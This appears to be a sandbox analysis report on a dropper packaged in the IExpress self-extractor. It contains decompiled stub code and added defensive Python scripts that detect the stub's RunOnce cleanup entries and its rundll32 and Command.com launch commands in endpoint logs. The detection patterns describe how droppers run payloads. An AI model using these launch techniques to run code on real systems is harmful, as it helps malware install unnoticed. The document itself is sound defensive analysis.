                                                    				r8d = _t61;
                                                    				if (GetModuleFileNameA(??, ??, ??) != 0) goto 0x4c511ee8;
                                                    				RegCloseKey(??);
                                                    				goto 0x4c512019;
                                                    				 *(_t161 + 0x20) = 0x4c51d610;
                                                    				 *0x4c51c820 = r14d ^ 0x00000001;
                                                    				_t167 =  !=  ? "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"" : "%s /D:%s";
                                                    				E00007FF67FF64C51114C(_t153, _t155,  !=  ? "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"" : "%s /D:%s", _t161 + 0x60);
                                                    				if ( *((char*)(_t153 + _t118 + 1)) != 0) goto 0x4c511fc4;
                                                    				r9d = 1;
                                                    				 *(_t161 + 0x28) = 2;
                                                    				r8d = 0;
                                                    				 *(_t161 + 0x20) = _t153;
                                                    				RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
                                                    				RegCloseKey(??); // executed
                                                    				return E00007FF67FF64C518470(LocalFree(??), 0,  *(_t158 + 0x180) ^ _t161);
                                                    			}
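The function above is the self-cleanup registration of the wextract (IExpress) self-extractor stub this sample is packaged in. It opens Software\Microsoft\Windows\CurrentVersion\RunOnce with KEY_READ | KEY_WRITE (samDesired 0x2001f; the hive root is not visible in the decompile), queries an existing wextract_cleanup%d value, loads advpack.dll to test whether DelNodeRunDLL32 is exported, and then writes a REG_EXPAND_SZ value (type 2) holding either rundll32.exe <sysdir>advpack.dll,DelNodeRunDLL32 "<extraction dir>" or, when the export is missing, <own module path> /D:<extraction dir>. Both commands delete the IXP000.TMP extraction directory the next time RunOnce is processed, which is why that directory is frequently gone by the time a host is examined. The Python below is an added triage example, not code from the report or from the sample: it parses RunOnce (name, data) pairs, recognises both command forms built by the decompiled code, recovers the extraction directory, and records whether it follows the %TEMP%\IXP###.TMP convention. The values in SAMPLE_RUNONCE are constructed for the example; the Informazion.exe download path and the third, unrelated entry are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Value name the stub formats as "wextract_cleanup%d" before querying/writing it.
NAME_RE = re.compile(r"^wextract_cleanup(?P<n>\d+)$", re.IGNORECASE)

# Form 1, used when advpack.dll exports DelNodeRunDLL32:
#   rundll32.exe <sysdir>advpack.dll,DelNodeRunDLL32 "<dir>"
RUNDLL_RE = re.compile(
    r'^rundll32\.exe\s+(?P<sysdir>.*?)advpack\.dll,DelNodeRunDLL32\s+"(?P<target>[^"]*)"\s*$',
    re.IGNORECASE,
)

# Form 2, the fallback when GetProcAddress fails:  <module path> /D:<dir>
SELF_RE = re.compile(r'^(?P<exe>"[^"]+"|\S+)\s+/D:(?P<target>.+?)\s*$', re.IGNORECASE)

# Extraction directories created by the stub look like ...\Temp\IXP000.TMP\
IXP_RE = re.compile(r"\\IXP\d{3}\.TMP\\?$", re.IGNORECASE)


@dataclass
class CleanupEntry:
    name: str
    form: str          # "rundll32" or "self"
    target_dir: str    # directory the command will delete
    helper: str        # advpack.dll path, or the SFX stub's own path
    in_ixp_temp: bool  # True when target_dir follows the IXP###.TMP convention


def parse_runonce_value(name: str, data: str) -> Optional[CleanupEntry]:
    """Return a CleanupEntry if (name, data) is a wextract cleanup value, else None."""
    if not NAME_RE.match(name):
        return None
    m = RUNDLL_RE.match(data)
    if m:
        target = m.group("target")
        return CleanupEntry(name, "rundll32", target,
                            m.group("sysdir") + "advpack.dll",
                            bool(IXP_RE.search(target)))
    m = SELF_RE.match(data)
    if m:
        target = m.group("target")
        return CleanupEntry(name, "self", target,
                            m.group("exe").strip('"'),
                            bool(IXP_RE.search(target)))
    return None


def triage_runonce(values: Iterable[Tuple[str, str]]) -> List[CleanupEntry]:
    """Filter a RunOnce listing down to the wextract cleanup entries it contains."""
    found = []
    for name, data in values:
        entry = parse_runonce_value(name, data)
        if entry is not None:
            found.append(entry)
    return found


# Constructed sample: one value in each form the decompiled code builds, plus an
# unrelated RunOnce value. All paths are assumptions made for this example.
SAMPLE_RUNONCE = [
    ("wextract_cleanup0",
     "rundll32.exe C:\\Windows\\System32\\advpack.dll,DelNodeRunDLL32 "
     "\"C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\\""),
    ("wextract_cleanup1",
     "C:\\Users\\user\\Downloads\\Informazion.exe "
     "/D:C:\\Users\\user\\AppData\\Local\\Temp\\IXP001.TMP\\"),
    ("OneDriveSetup", "C:\\Windows\\SysWOW64\\OneDriveSetup.exe /thfirstsetup"),
]

if __name__ == "__main__":
    for e in triage_runonce(SAMPLE_RUNONCE):
        print(f"{e.name}: form={e.form} target={e.target_dir} "
              f"helper={e.helper} ixp_temp={e.in_ixp_temp}")
```

On a live host the same (name, data) pairs can be enumerated with winreg.EnumValue over the RunOnce key; the parser deliberately does no registry access itself so it also runs over values exported from a forensic image or a hive file. The recovered target directory is the place to look for the dropped payload and the IExpress SED directives (RUNPROGRAM, POSTRUNPROGRAM) before the cleanup command removes it.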

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                    • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                    • API String ID: 178549006-3726664654
                                                    • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                    • Instruction ID: 800245bac096a5c29b2cd218871175b14795ca5d4f726914906367460b52aca6
                                                    • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                    • Instruction Fuzzy Hash: 54814C36E0CA8186EB14BF19E8482BEBBA0FB89B54F445136D96E83754DF3CE125C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (rendered graph omitted; the blocks of E00007FF67FF64C511684 span 7ff64c511684 to 7ff64c511c03 and call CompareStringA, GetFileAttributesA, GetPrivateProfileIntA, GetPrivateProfileStringA, GetShortPathNameA and LocalAlloc)

                                                    C-Code - Quality: 51%
                                                    			E00007FF67FF64C511684(intOrPtr __ebx, signed long long __rbx, void* __rcx, void* __rdx, long long* __r8, intOrPtr* __r9) {
                                                    				void* __rsi;
                                                    				void* __rbp;
                                                    				char _t81;
                                                    				intOrPtr _t83;
                                                    				char _t84;
                                                    				char _t85;
                                                    				int _t96;
                                                    				signed char _t109;
                                                    				char _t110;
                                                    				char _t113;
                                                    				intOrPtr _t117;
                                                    				char _t143;
                                                    				char _t154;
                                                    				char _t157;
                                                    				void* _t161;
                                                    				void* _t168;
                                                    				char _t179;
                                                    				char _t184;
                                                    				signed long long _t187;
                                                    				long long _t194;
                                                    				void* _t196;
                                                    				intOrPtr* _t204;
                                                    				long long _t206;
                                                    				long long _t208;
                                                    				long long _t210;
                                                    				signed long long _t217;
                                                    				long long _t219;
                                                    				void* _t220;
                                                    				long long _t222;
                                                    				char* _t225;
                                                    				void* _t226;
                                                    				char* _t228;
                                                    				void* _t229;
                                                    				char* _t230;
                                                    				void* _t240;
                                                    				char* _t250;
                                                    				void* _t251;
                                                    				char* _t262;
                                                    				void* _t272;
                                                    				char* _t276;
                                                    				void* _t277;
                                                    				int _t279;
                                                    				intOrPtr* _t280;
                                                    				char* _t281;
                                                    				void* _t282;
                                                    				void* _t284;
                                                    				CHAR* _t287;
                                                    				long long _t288;
                                                    				intOrPtr _t289;
                                                    				intOrPtr* _t290;
                                                    				CHAR* _t292;
                                                    				void* _t293;
                                                    				void* _t295;
                                                    				signed long long _t296;
                                                    				CHAR* _t324;
                                                    				long long* _t325;
                                                    				char* _t327;
                                                    				int _t329;
                                                    				void* _t330;
                                                    				char* _t332;
                                                    				int _t335;
                                                    
                                                    				_t259 = __rdx;
                                                    				_t217 = __rbx;
                                                    				_t117 = __ebx;
                                                    				 *((long long*)(_t295 + 0x10)) = __rbx;
                                                    				_t293 = _t295 - 0x570;
                                                    				_t296 = _t295 - 0x670;
                                                    				_t187 =  *0x4c51c008; // 0xdeba5460e397
                                                    				 *(_t293 + 0x560) = _t187 ^ _t296;
                                                    				_t330 = __rcx;
                                                    				_t225 = _t293 + 0x50;
                                                    				_t323 = __rcx - _t293 + 0x50;
                                                    				r13d = 0;
                                                    				_t325 = __r8;
                                                    				_t6 = _t259 + 0x7ffffefa; // 0x7ffffffe
                                                    				if (_t6 == 0) goto 0x4c5116f2;
                                                    				_t81 =  *((intOrPtr*)(__rcx - _t293 + 0x50 + _t225));
                                                    				_t143 = _t81;
                                                    				if (_t143 == 0) goto 0x4c5116f2;
                                                    				 *_t225 = _t81;
                                                    				_t226 = _t225 + 1;
                                                    				if (_t143 != 0) goto 0x4c5116d3;
                                                    				_t192 =  !=  ? _t226 : _t226 - 1;
                                                    				 *((intOrPtr*)( !=  ? _t226 : _t226 - 1)) = r13b;
                                                    				if ( *((char*)(_t293 + 0x50)) != 0x22) goto 0x4c511713;
                                                    				goto 0x4c51171e;
                                                    				_t262 = " ";
                                                    				_t194 = _t293 + 0x50;
                                                    				 *((long long*)(_t296 + 0x30)) = _t194;
                                                    				E00007FF67FF64C5115E8(_t194, __rbx, _t296 + 0x30, _t262, _t287, _t293);
                                                    				_t280 =  *((intOrPtr*)(_t296 + 0x30));
                                                    				_t288 = _t194;
                                                    				if (_t280 == 0) goto 0x4c5117aa;
                                                    				_t196 = (_t217 | 0xffffffff) + 1;
                                                    				if ( *((intOrPtr*)(_t280 + _t196)) != r13b) goto 0x4c511741;
                                                    				if (_t196 - 3 < 0) goto 0x4c5117aa;
                                                    				_t83 =  *((intOrPtr*)(_t280 + 1));
                                                    				if (_t83 != 0x3a) goto 0x4c51175e;
                                                    				if ( *((intOrPtr*)(_t280 + 2)) == 0x5c) goto 0x4c511766;
                                                    				if ( *_t280 != 0x5c) goto 0x4c5117aa;
                                                    				if (_t83 != 0x5c) goto 0x4c5117aa;
                                                    				_t228 = _t296 + 0x40;
                                                    				_t20 = _t262 + 0x7ffffefa; // 0x7ffffffe
                                                    				if (_t20 == 0) goto 0x4c51179a;
                                                    				_t84 =  *((intOrPtr*)(_t280 - _t296 + 0x40 + _t228));
                                                    				_t154 = _t84;
                                                    				if (_t154 == 0) goto 0x4c51179a;
                                                    				 *_t228 = _t84;
                                                    				_t229 = _t228 + 1;
                                                    				if (_t154 != 0) goto 0x4c51177b;
                                                    				_t200 =  !=  ? _t229 : _t229 - 1;
                                                    				 *((intOrPtr*)( !=  ? _t229 : _t229 - 1)) = r13b;
                                                    				goto 0x4c511804;
                                                    				r9d = 0x104;
                                                    				_t230 = _t296 + 0x40;
                                                    				if (_t262 - 1 + 0x7ffffefa == 0) goto 0x4c5117e6;
                                                    				_t85 =  *((intOrPtr*)(0x4c51d610 - _t296 + 0x40 + _t230));
                                                    				_t157 = _t85;
                                                    				if (_t157 == 0) goto 0x4c5117e6;
                                                    				 *_t230 = _t85;
                                                    				if (_t157 != 0) goto 0x4c5117c7;
                                                    				_t204 =  !=  ? _t230 + 1 : _t230 + 1 - 1;
                                                    				 *_t204 = r13b;
                                                    				E00007FF67FF64C517BA8(r9d, _t204, _t217 | 0xffffffff, _t296 + 0x40, _t288, _t293, _t280);
                                                    				E00007FF67FF64C517D68(0x2e, _t204, _t217 | 0xffffffff, _t280, _t288, _t293);
                                                    				if (_t204 == 0) goto 0x4c511a1b;
                                                    				 *((intOrPtr*)(_t296 + 0x28)) = _t117;
                                                    				 *((long long*)(_t296 + 0x20)) = ".INF";
                                                    				r9d = _t117;
                                                    				if (CompareStringA(_t335, _t329, _t327) != 2) goto 0x4c511a1b;
                                                    				_t161 = GetFileAttributesA(_t324) - 0xffffffff;
                                                    				if (_t161 == 0) goto 0x4c5119f3;
                                                    				if (_t161 == 0) goto 0x4c5119f3;
                                                    				 *((long long*)(_t296 + 0x30)) = _t288;
                                                    				E00007FF67FF64C5115E8(_t204, _t217 | 0xffffffff, _t296 + 0x30, "[", _t288, _t293);
                                                    				if (_t204 == 0) goto 0x4c5118b5;
                                                    				_t206 =  !=  ? _t204 :  *((intOrPtr*)(_t296 + 0x30));
                                                    				 *((long long*)(_t296 + 0x30)) = _t206;
                                                    				E00007FF67FF64C5115E8(_t206, _t217 | 0xffffffff, _t296 + 0x30, "]", _t288, _t293);
                                                    				LocalAlloc(_t279);
                                                    				_t219 = _t206;
                                                    				if (_t206 == 0) goto 0x4c511aa2;
                                                    				_t289 =  *((intOrPtr*)(_t296 + 0x30));
                                                    				_t281 = "DefaultInstall";
                                                    				_t240 =  !=  ? _t289 : _t281;
                                                    				r8d = 0;
                                                    				_t96 = GetPrivateProfileIntA(_t287, _t292);
                                                    				 *__r9 = 1;
                                                    				 *0x4c51d540 = _t96;
                                                    				 *((long long*)(_t296 + 0x28)) = _t296 + 0x40;
                                                    				 *((intOrPtr*)(_t296 + 0x20)) = 8;
                                                    				if (GetPrivateProfileStringA(??, ??, ??, ??, ??, ??) == 0) goto 0x4c511984;
                                                    				 *0x4c51de64 =  *0x4c51de64 | 0x00000004;
                                                    				_t282 =  !=  ? _t289 : _t281;
                                                    				E00007FF67FF64C511008(_t330, "AdvancedINF", _t282, _t323);
                                                    				E00007FF67FF64C511008(_t219, "AdvancedINF", _t296 + 0x40, _t323);
                                                    				goto 0x4c511bd1;
                                                    				 *0x4c51de64 =  *0x4c51de64 & 0xfffffffb;
                                                    				_t168 =  *0x4c51de78 - r13w; // 0x3
                                                    				if (_t168 != 0) goto 0x4c5119ba;
                                                    				r8d = 0x104;
                                                    				GetShortPathNameA(??, ??, ??);
                                                    				goto 0x4c5119c1;
                                                    				_t332 = "setupapi.dll";
                                                    				_t208 = _t296 + 0x40;
                                                    				 *((long long*)(_t296 + 0x28)) = _t208;
                                                    				_t283 =  !=  ? _t289 : _t282;
                                                    				 *((long long*)(_t296 + 0x20)) =  !=  ? _t289 : _t282;
                                                    				E00007FF67FF64C51114C(_t219, _t296 + 0x40, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t332);
                                                    				goto 0x4c511bd1;
                                                    				r9d = 0;
                                                    				 *((intOrPtr*)(_t296 + 0x28)) = r13d;
                                                    				 *((intOrPtr*)(_t296 + 0x20)) = 0x10;
                                                    				E00007FF67FF64C514DCC(_t219, _t296 + 0x40, _t332, _t323);
                                                    				goto 0x4c511bda;
                                                    				E00007FF67FF64C517D68(0x2e, _t208, _t219,  !=  ? _t289 : _t282, _t289, _t293);
                                                    				if (_t208 == 0) goto 0x4c511acb;
                                                    				 *((intOrPtr*)(_t296 + 0x28)) = _t117;
                                                    				 *((long long*)(_t296 + 0x20)) = ".BAT";
                                                    				r9d = _t117;
                                                    				if (CompareStringA(??, ??, ??, ??, ??, ??) != 2) goto 0x4c511acb;
                                                    				_t290 = "Command.com /c %s";
                                                    				_t210 = _t219 + 1;
                                                    				if ( *((intOrPtr*)(_t290 + _t210)) != r13b) goto 0x4c511a6a;
                                                    				_t220 = _t219 + 1;
                                                    				if ( *((intOrPtr*)(_t296 + 0x40 + _t220)) != r13b) goto 0x4c511a78;
                                                    				_t284 = _t210 + _t220;
                                                    				LocalAlloc(??, ??);
                                                    				if (_t210 != 0) goto 0x4c511ab2;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				goto 0x4c511a00;
                                                    				_t272 = _t284 + 8;
                                                    				E00007FF67FF64C51114C(_t210, _t272, _t290, _t296 + 0x40);
                                                    				goto 0x4c511bd1;
                                                    				LocalAlloc(??, ??);
                                                    				_t222 = _t210;
                                                    				if (_t210 == 0) goto 0x4c511aa2;
                                                    				_t109 = GetFileAttributesA(??); // executed
                                                    				if (_t109 == 0xffffffff) goto 0x4c511b7e;
                                                    				if ((_t109 & 0x00000010) != 0) goto 0x4c511b7e;
                                                    				_t250 = _t293 + 0x160;
                                                    				_t68 = _t272 + 0x7ffffbfe; // 0x7ffffffe
                                                    				if (_t68 == 0) goto 0x4c511b3c;
                                                    				_t110 =  *((intOrPtr*)(_t250 + _t296 + 0x40 - _t293 + 0x160));
                                                    				_t179 = _t110;
                                                    				if (_t179 == 0) goto 0x4c511b3c;
                                                    				 *_t250 = _t110;
                                                    				_t251 = _t250 + 1;
                                                    				if (_t179 != 0) goto 0x4c511b1d;
                                                    				_t214 =  !=  ? _t251 : _t251 - 1;
                                                    				 *((intOrPtr*)( !=  ? _t251 : _t251 - 1)) = r13b;
                                                    				if (_t290 == 0) goto 0x4c511bbc;
                                                    				if ( *_t290 == r13b) goto 0x4c511bbc;
                                                    				E00007FF67FF64C511084(_t293 + 0x160, _t284, " ");
                                                    				E00007FF67FF64C511084(_t293 + 0x160, _t284, _t290);
                                                    				goto 0x4c511bbc;
                                                    				_t276 = _t293 + 0x160;
                                                    				_t75 = _t284 + 0x7ffffbfe; // 0x7ffffffe
                                                    				if (_t75 == 0) goto 0x4c511bae;
                                                    				_t113 =  *((intOrPtr*)(_t276 + _t332 - _t293 + 0x160));
                                                    				_t184 = _t113;
                                                    				if (_t184 == 0) goto 0x4c511bae;
                                                    				 *_t276 = _t113;
                                                    				_t277 = _t276 + 1;
                                                    				if (_t184 != 0) goto 0x4c511b8f;
                                                    				_t255 =  !=  ? _t277 : _t277 - 1;
                                                    				 *((intOrPtr*)( !=  ? _t277 : _t277 - 1)) = r13b;
                                                    				 *_t222 = r13b;
                                                    				E00007FF67FF64C512A6C(_t222, _t293 + 0x160, _t222, _t222);
                                                    				 *_t325 = _t222;
                                                    				return E00007FF67FF64C518470(1, 0x40,  *(_t293 + 0x560) ^ _t296);
                                                    			}
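The decompiled function above is the sample's launcher for an extracted payload: when the extracted file ends in .INF it reads the file with GetPrivateProfileIntA/GetPrivateProfileStringA (section defaulting to "DefaultInstall") and formats "rundll32.exe %s,InstallHinfSection %s 128 %s" with "setupapi.dll", the section and the INF path (optionally shortened with GetShortPathNameA); when it ends in .BAT it formats "Command.com /c %s". As an added example that is not part of the Joe Sandbox report or of the sample, the following matcher turns those two command-line shapes into a process-creation detection and runs it over a few constructed log lines. The rule names, the temp-directory heuristic and the sample command lines are assumptions made for the illustration.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# The two launcher templates are the format strings visible in the decompiled
# function above: the .INF branch builds
#   "rundll32.exe %s,InstallHinfSection %s 128 %s"   (dll, section, inf path)
# with "setupapi.dll" and a section that defaults to "DefaultInstall"; the
# .BAT branch builds "Command.com /c %s". Everything else in this file (rule
# names, the temp-directory heuristic, the sample log lines) is assumed.

INF_LAUNCH = re.compile(
    r"""rundll32(?:\.exe)?"?\s+
        (?P<dll>\S*setupapi\.dll)\s*,\s*InstallHinfSection\s+
        (?P<section>\S+)\s+(?P<flags>\d+)\s+(?P<inf>.+?\.inf)\s*$""",
    re.IGNORECASE | re.VERBOSE,
)
BAT_LAUNCH = re.compile(
    r"""command\.com\s+/c\s+(?P<bat>.+?\.bat)\s*$""",
    re.IGNORECASE,
)
# Heuristic (assumption): an INF or BAT under a per-user temp directory is what a
# self-extracting dropper leaves behind; a vendor-installed INF normally is not.
TEMP_PATH = re.compile(r"\\(?:Temp|Tmp)\\", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    detail: Dict[str, str]
    reasons: List[str] = field(default_factory=list)


def classify(cmdline: str) -> Optional[Finding]:
    """Return a Finding if the command line has one of the two launcher shapes."""
    m = INF_LAUNCH.search(cmdline)
    if m:
        f = Finding("inf_install_via_rundll32", m.groupdict())
        if f.detail["section"].lower() == "defaultinstall":
            f.reasons.append("section is the stub's hard-coded default 'DefaultInstall'")
        if f.detail["flags"] == "128":
            f.reasons.append("flag 128 makes the INF's own directory the source path")
        if TEMP_PATH.search(f.detail["inf"]):
            f.reasons.append("INF is in a temp directory")
        return f
    m = BAT_LAUNCH.search(cmdline)
    if m:
        f = Finding("bat_via_command_com", m.groupdict())
        if TEMP_PATH.search(f.detail["bat"]):
            f.reasons.append("BAT is in a temp directory")
        return f
    return None


def scan(cmdlines: List[str]) -> List[Tuple[int, Finding]]:
    """Run classify() over process command lines, keeping the line index of each hit."""
    hits = []
    for idx, line in enumerate(cmdlines):
        f = classify(line)
        if f is not None:
            hits.append((idx, f))
    return hits


# Constructed process-creation command lines for the demonstration; they are not
# taken from the report. Lines 0 and 1 have the shape this function builds,
# lines 2 and 3 are ordinary rundll32/cmd usage that must not match.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\rundll32.exe" setupapi.dll,InstallHinfSection DefaultInstall 128 '
    r'C:\Users\user\AppData\Local\Temp\extract\install.inf',
    r'Command.com /c C:\Users\user\AppData\Local\Temp\extract\run.bat',
    r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL appwiz.cpl',
    r'C:\Windows\System32\cmd.exe /c whoami',
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_CMDLINES):
        print(idx, finding.rule, finding.detail, "; ".join(finding.reasons))
```

The matcher keys on the literal InstallHinfSection export and the setupapi.dll argument rather than on rundll32 alone, so ordinary control-panel and shell rundll32 invocations stay silent; the reasons list is what an analyst would triage on, since the "DefaultInstall" section name and the 128 flag are both the stub's own defaults.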
                                                    Instruction addresses of the listing above: 0x7ff64c511684 to 0x7ff64c511c03

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
• Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                    • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                    • API String ID: 383838535-3544074861
                                                    • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                    • Instruction ID: 27e729e5e08870e6a805eb0b90993c3ca9c66844e1bcfd85f8c5fd5e101226ae
                                                    • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                    • Instruction Fuzzy Hash: 54E1C026E0C68285EB19BF18A4082BE7FA0EB45794F944177CA6D83796DF3DD529C300
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
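The String ID line above is the useful triage signal in this block: C:\Users\user\AppData\Local\Temp\IXP000.TMP\, "Command.com /c %s" and "rundll32.exe %s,InstallHinfSection %s 128 %s" are the extraction directory and the two post-extraction launch templates of the Microsoft IExpress self-extractor stub, so the dropped payload and its launcher will show up under that directory in endpoint telemetry. The following hunting rules are an added example written for this page; they are not part of the Joe Sandbox output and not code from the sample. The key=value log layout and every log line are constructed for the example, the three-digit IXP counter (IXP000, IXP001, ...) is an assumption, and the msdownld.tmp marker is taken from the decompiled function further down on this page.

```python
"""Hunting rules for the IExpress self-extractor artifacts listed in this report.

Added example for this page; not part of the Joe Sandbox output and not code from
the sample. Markers: the %TEMP%\IXP000.TMP\ extraction directory, the
"Command.com /c %s" launcher and the "rundll32.exe %s,InstallHinfSection %s 128 %s"
template from the String ID line, plus msdownld.tmp from the decompiled function.
The key=value log format and all log lines below are CONSTRUCTED for the example;
a three-digit IXP counter (IXP000, IXP001, ...) is an ASSUMPTION.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

IXP_DIR = re.compile(r"\\IXP\d{3}\.TMP\\", re.IGNORECASE)
MSDOWNLD = re.compile(r"\\msdownld\.tmp\\", re.IGNORECASE)
INF_INSTALL = re.compile(r"rundll32(\.exe)?\s+\S+,\s*InstallHinfSection\b", re.IGNORECASE)
SHELL_C = re.compile(r"\b(command\.com|cmd\.exe)\s+/c\b", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    line_no: int
    evidence: str


def parse_kv(line: str) -> dict[str, str]:
    """Split 'Key=value Key2=value with spaces' records; a value runs to the next ' Key=' token."""
    return {m.group(1): m.group(2).strip()
            for m in re.finditer(r"(\w+)=(.*?)(?=\s+\w+=|$)", line)}


def evaluate(line_no: int, rec: dict[str, str]) -> list[Finding]:
    """Apply the rules to one parsed record (EventID 1 = process creation, 11 = file creation)."""
    out: list[Finding] = []
    if rec.get("EventID") == "1":
        image, cmd = rec.get("Image", ""), rec.get("CommandLine", "")
        if IXP_DIR.search(image):          # a binary executing out of the extraction directory
            out.append(Finding("child_started_from_ixp_dir", line_no, image))
        if INF_INSTALL.search(cmd):        # the INF-install launch template
            out.append(Finding("rundll32_installhinfsection", line_no, cmd))
        if SHELL_C.search(cmd) and IXP_DIR.search(cmd):   # the "Command.com /c %s" template
            out.append(Finding("shell_runprogram_in_ixp_dir", line_no, cmd))
    elif rec.get("EventID") == "11":
        target = rec.get("TargetFilename", "")
        if IXP_DIR.search(target) or MSDOWNLD.search(target):   # payload being dropped
            out.append(Finding("write_to_iexpress_extraction_dir", line_no, target))
    return out


def scan(log: str) -> list[Finding]:
    """Run every rule over a multi-line log; findings carry the 1-based line number."""
    findings: list[Finding] = []
    for n, line in enumerate(log.splitlines(), 1):
        if line.strip():
            findings.extend(evaluate(n, parse_kv(line)))
    return findings


# Constructed Sysmon-style records, not real telemetry from the analysis.
SAMPLE_LOG = r"""EventID=1 Image=C:\Users\user\Downloads\Informazion.exe CommandLine="C:\Users\user\Downloads\Informazion.exe" ParentImage=C:\Windows\explorer.exe
EventID=11 Image=C:\Users\user\Downloads\Informazion.exe TargetFilename=C:\Users\user\AppData\Local\Temp\IXP000.TMP\payload.bin
EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c C:\Users\user\AppData\Local\Temp\IXP000.TMP\run.bat ParentImage=C:\Users\user\Downloads\Informazion.exe
EventID=1 Image=C:\Windows\System32\rundll32.exe CommandLine=rundll32.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\setup.inf,InstallHinfSection DefaultInstall 128 C:\Users\user\AppData\Local\Temp\IXP000.TMP\setup.inf ParentImage=C:\Users\user\Downloads\Informazion.exe
EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe ParentImage=C:\Windows\explorer.exe
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule}: {f.evidence}")
```

IExpress packages are also produced by legitimate installers, so the extraction-directory rule on its own is a hunting lead rather than an alert; the combination that matters for this sample is a shell or rundll32 launch out of IXP000.TMP whose parent is a user-downloaded executable.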

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
control_flow_graph (basic block: address range, API/calls -> successor blocks)
238 7ff64c5166c4-7ff64c516724 call 7ff64c515050 LocalAlloc -> 241, 242
241 7ff64c516756-7ff64c51676a call 7ff64c515050 -> 248, 249
242 7ff64c516726-7ff64c516749 call 7ff64c514dcc call 7ff64c517700 -> 254
248 7ff64c51676c-7ff64c5167a3 call 7ff64c514dcc LocalFree -> 254
249 7ff64c5167a5-7ff64c5167ea lstrcmpA LocalFree -> 252, 253
252 7ff64c516837-7ff64c51683d -> 255, 256
253 7ff64c5167ec-7ff64c5167ee -> 258, 259
254 7ff64c51674f-7ff64c516751 -> 261
255 7ff64c516843-7ff64c516849 -> 256, 263
256 7ff64c516b14-7ff64c516b38 call 7ff64c517ac8 -> 261
258 7ff64c5167fb -> 260
259 7ff64c5167f0-7ff64c5167f9 -> 258, 260
260 7ff64c5167fe-7ff64c51680e call 7ff64c5164e4 -> 273, 274
261 7ff64c516b3a-7ff64c516b66 call 7ff64c518470 (function exit)
263 7ff64c51684f-7ff64c516870 GetTempPathA -> 267, 268
267 7ff64c5168ad-7ff64c5168b9 -> 270
268 7ff64c516872-7ff64c51687e call 7ff64c5164e4 -> 276
270 7ff64c5168bc-7ff64c5168bf -> 275
273 7ff64c516b0f-7ff64c516b12 -> 261
274 7ff64c516814-7ff64c516832 call 7ff64c514dcc -> 254
275 7ff64c5168c4-7ff64c5168ce -> 278, 279
276 7ff64c516883-7ff64c516885 -> 273, 280
278 7ff64c5168d0-7ff64c5168d5 -> 279, 282
279 7ff64c5168e1-7ff64c5168f3 -> 283, 284
280 7ff64c51688b-7ff64c516895 call 7ff64c512468 -> 267, 290
282 7ff64c5168d7-7ff64c5168df -> 275, 279
